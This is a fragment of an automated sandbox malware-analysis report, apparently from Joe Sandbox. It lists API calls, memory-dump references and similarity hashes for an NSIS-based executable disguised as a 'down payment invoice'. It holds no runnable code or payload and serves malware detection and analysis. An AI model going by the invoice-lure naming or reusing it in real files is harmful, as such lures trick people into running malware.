• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
                                                                                                                                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                      • String ID: %u.%u%s%s$(7B
                                                                                                                                                                                                                      • API String ID: 3540041739-1320723960
                                                                                                                                                                                                                      • Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                                                                                                                                      • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

APIs
• WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nskD796.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nskD796.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
• lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nskD796.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nskD796.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nskD796.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
Strings
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: ByteCharMultiWidelstrlen
• String ID: C:\Users\user\AppData\Local\Temp\nskD796.tmp$C:\Users\user\AppData\Local\Temp\nskD796.tmp\System.dll
• API String ID: 3109718747-1673095416
• Opcode ID: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
• Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
• Opcode Fuzzy Hash: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
• Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E
Uniqueness
Uniqueness Score: -1.00%

APIs
• GlobalFree.KERNEL32(00000000), ref: 6F1D24DA
  • Part of subcall function 6F1D122C: lstrcpynW.KERNEL32(00000000,?,6F1D12DF,00000019,6F1D11BE,-000000A0), ref: 6F1D123C
• GlobalAlloc.KERNEL32(00000040), ref: 6F1D2460
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6F1D247B
Memory Dump Source
• Source File: 00000003.00000002.40207130676.000000006F1D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F1D0000, based on PE: true
• Associated: 00000003.00000002.40207085632.000000006F1D0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.40207174922.000000006F1D3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.40207213148.000000006F1D5000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6f1d0000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
• String ID:
• API String ID: 4216380887-0
• Opcode ID: 8c521e30623eecdd0828b1f15d9b02e2fd3e15e588092252c33632f557e10cb3
• Instruction ID: ba9150130f1e509e9dac2437120f44ac10e6283b4e831dd6feb0a118cefa28aa
• Opcode Fuzzy Hash: 8c521e30623eecdd0828b1f15d9b02e2fd3e15e588092252c33632f557e10cb3
• Instruction Fuzzy Hash: 7641F1B1008385EFD710DF38D940A6677B8FB693A0F104A5EF866D7580D731B4A5CB61
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetDC.USER32(?), ref: 00401DBC
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
• MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
• ReleaseDC.USER32(?,00000000), ref: 00401DEF
• CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID:
• API String ID: 3808545654-0
• Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
• Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
• Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
• Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
Uniqueness
Uniqueness Score: -1.00%

APIs
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6F1D21F0,?,00000808), ref: 6F1D1639
• GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6F1D21F0,?,00000808), ref: 6F1D1640
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6F1D21F0,?,00000808), ref: 6F1D1654
• GetProcAddress.KERNEL32(6F1D21F0,00000000), ref: 6F1D165B
• GlobalFree.KERNEL32(00000000), ref: 6F1D1664
Memory Dump Source
• Source File: 00000003.00000002.40207130676.000000006F1D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F1D0000, based on PE: true
• Associated: 00000003.00000002.40207085632.000000006F1D0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.40207174922.000000006F1D3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.40207213148.000000006F1D5000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6f1d0000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
• String ID:
• API String ID: 1148316912-0
• Opcode ID: 9ee404a2e7c428326a8526d2d7dd7e348f2176388e638688b22375c031ac71a3
• Instruction ID: c09a0cffc98cdfbf56492785d3060b253e201178106275c2150dc8fe5cbfe454
• Opcode Fuzzy Hash: 9ee404a2e7c428326a8526d2d7dd7e348f2176388e638688b22375c031ac71a3
• Instruction Fuzzy Hash: A6F0AC722075387BDA2116A68C4DC9BBEACDF8B2F5B110325F628D219086629D12DBF1
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1849352358-0
                                                                                                                                                                                                                      • Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                                                                                                                                      • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                                                                                                                      • String ID: !
                                                                                                                                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                      • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                                                                                                                                      • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76013420,004036EF,?,00000006,00000008,0000000A), ref: 00405CC3
                                                                                                                                                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76013420,004036EF,?,00000006,00000008,0000000A), ref: 00405CCD
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CBD
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                      • API String ID: 2659869361-3355392842
                                                                                                                                                                                                                      • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                                                                                                      • Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                                                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,76012EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76012EE0,00000000), ref: 00405D76
                                                                                                                                                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                                                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,76012EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76012EE0,00000000), ref: 00405E1E
                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76012EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76012EE0), ref: 00405E2E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: CharNext$AttributesFilelstrcpynlstrlen
• String ID: 0_B
• API String ID: 3248276644-2128305573
• Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
• Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
• Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
• Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
• RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 00406307
Strings
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: CloseQueryValue
• String ID: Call
• API String ID: 3356406503-1824292864
• Opcode ID: 525eaf9e8de9115a0521695d79f42080039b7e79be990b3fc1c06578ff73fab5
• Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
• Opcode Fuzzy Hash: 525eaf9e8de9115a0521695d79f42080039b7e79be990b3fc1c06578ff73fab5
• Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
• CloseHandle.KERNEL32(?), ref: 00405A07
Strings
• Error launching installer, xrefs: 004059E4
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
• Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
• Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
• Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
• Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
Uniqueness
• Uniqueness Score: -1.00%

APIs
• FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76012EE0,00403A1A,76013420,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A5D
• GlobalFree.KERNEL32(?), ref: 00403A64
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00403A55
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: Free$GlobalLibrary
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 1100898210-3355392842
• Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
• Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
• Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
• Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98
Uniqueness
• Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe,C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe,80000000,00000003), ref: 00405D0F
• CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe,C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe,80000000,00000003), ref: 00405D1F
Strings
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CharPrevlstrlen
                                                                                                                                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                      • API String ID: 2709904686-3370423016
                                                                                                                                                                                                                      • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                                                                                                      • Instruction ID: 65148869c9b5617484fe42b3676c909fd92059a2a8224d2a454660f99163d925
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3D0A7B7410920EAD3126B04DC04D9F73ACEF51300B46843BE840A7171D7785CD18BEC
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 6F1D116A
                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F1D11C7
                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F1D11D9
                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 6F1D1203
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40207130676.000000006F1D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207085632.000000006F1D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207174922.000000006F1D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207213148.000000006F1D5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6f1d0000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Global$Free$Alloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1780285237-0
                                                                                                                                                                                                                      • Opcode ID: ec08562df58d1ce6d04fef2e52563ba1188342f31865d9dbc7f9f4bacd03aed2
                                                                                                                                                                                                                      • Instruction ID: ae7ecfc9845697e5f6b9c7c0233c495c592531d87ea0a07fe3be72a288de6757
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec08562df58d1ce6d04fef2e52563ba1188342f31865d9dbc7f9f4bacd03aed2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B3190B25012059FFB009FB8D945AA6B7FCFB563E0B10462AF844F7254E736E921CB21
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                                                                                                                                      • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
